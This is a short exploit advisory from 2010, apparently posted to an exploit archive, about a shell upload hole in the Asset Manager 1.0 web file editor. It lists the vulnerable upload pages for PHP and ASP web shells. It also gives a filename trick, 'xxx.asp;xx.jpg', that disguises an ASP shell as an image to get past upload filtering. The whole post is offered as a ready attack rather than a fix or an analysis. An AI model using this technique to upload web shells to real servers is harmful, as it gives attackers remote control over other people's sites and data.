Asset Manager 1.0 Shell Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Asset Manager 1.0 Shell Upload Vulnerability
# Published : 2010-04-09
# Author : Shichemt Alen and NeT_Own3r
# Previous Title : Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability
# Next Title : Joomla Component com_articles SQL Injection Vulnerability

# Title: Asset Manager ( Shell Upload Vulnerability )
# Version: 1.0
# Author: Shichemt Alen & NeT_Own3r [ Meher Assel ]
# Software Link: http://www.sourcecodeonline.com/details/asset_manager_cms_and_file_editor.html
# Price : $35.00

############### Founded By Net_Own3r & Shichemt Alen ###############

Hi All Muslims Brothers & All Hackers


# Exploit :

http://127.0.0.1/assetmanager/assetmanager.php (Upload shell php)
or
http://127.0.0.1/assetmanager/assetmanager.asp (Upload shell asp)

# Note :
For ASP shell File name can be like this : xxx.asp;xx.jpg <=== No more priv8 ;)

####################################################################

MaiL :
Meher Assel : ow3ner@hotmail.com<mailto:ow3ner@hotmail.com>
Shichemt Alen : Shichemt@hotmail.com<mailto:Shichemt@hotmail.com>

###################### Made In Tunisia [+216] ###########################